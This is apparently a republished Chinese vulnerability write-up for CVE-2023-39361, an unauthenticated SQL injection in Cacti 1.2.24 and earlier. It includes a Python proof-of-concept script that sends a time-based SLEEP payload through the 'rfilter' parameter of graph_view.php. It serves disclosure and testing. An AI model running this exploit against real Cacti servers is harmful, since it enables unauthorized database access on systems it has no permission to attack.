Cacti 未经身份验证SQL注入漏洞

0x00 前言

Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。

Cacti是通过 snmpget来获取数据,使用 RRDtool绘画图形,而且你完全可以不需要了解RRDtool复杂的参数。

0x01 漏洞描述

漏洞存在于从graph_view.php文件调用的growt_right_pane_tree函数中。

在tree_content的情况下,通过html_validate_tree_vars函数验证用户输入,随后,如果tree_id参数大于0,则调用growt_right_pane_tree函数。

0x02 CVE编号

CVE-2023-39361

0x03 影响版本

Cacti<=1.2.24

0x04 测试POC

代码语言:javascript

代码运行次数:0

运行

AI代码解释

复制代码
import argparse
import requests
import sys
import urllib3


#import os
#os.environ['http_proxy'] = 'http://localhost:8080'


sleep_time = 10
payload = f""""OR ""="(("));SELECT SLEEP({sleep_time});-- -"""


def exploit():
    url = f"{target}/graph_view.php"


    params = {
        "action":"tree_content",
        "node":"1-1-tree_anchor",
        "rfilter":payload
    }


    print('[+] Sending payload...')
    print(f"[+] Payload: {payload}")
    session.get(url,params=params)
    
if __name__=='__main__':
    urllib3.disable_warnings()
    parser = argparse.ArgumentParser(description="Cacti 1.2.24 - graph_view.php 'rfilter' SQL Injection (guest access)")
    parser.add_argument('-t','--target',help='',required=True)
    args = parser.parse_args()
    
    target = args.target
    session = requests.Session()


    exploit()
相关推荐
枷锁—sha3 分钟前
【PortSwigger Academy】SQL 注入绕过登录 (Login Bypass)
数据库·sql·学习·安全·网络安全
June bug38 分钟前
【配环境】安卓项目开发环境
android
逍遥德2 小时前
PostgreSQL 中唯一约束(UNIQUE CONSTRAINT) 和唯一索引(UNIQUE INDEX) 的核心区别
数据库·sql·postgresql·dba
工业甲酰苯胺2 小时前
字符串分割并展开成表格的SQL实现方法
数据库·sql
科技块儿2 小时前
IP定位技术:游戏反外挂体系中的精准识别引擎
数据库·tcp/ip·游戏
衫水3 小时前
[特殊字符] MySQL 常用指令大全
数据库·mysql·oracle
卓怡学长3 小时前
m115乐购游戏商城系统
java·前端·数据库·spring boot·spring·游戏
2501_944526423 小时前
Flutter for OpenHarmony 万能游戏库App实战 - 蜘蛛纸牌游戏实现
android·java·python·flutter·游戏
csj503 小时前
安卓基础之《(18)—内容提供者(4)在应用之间共享文件》
android
小句3 小时前
SQL中JOIN语法详解 GROUP BY语法详解
数据库·sql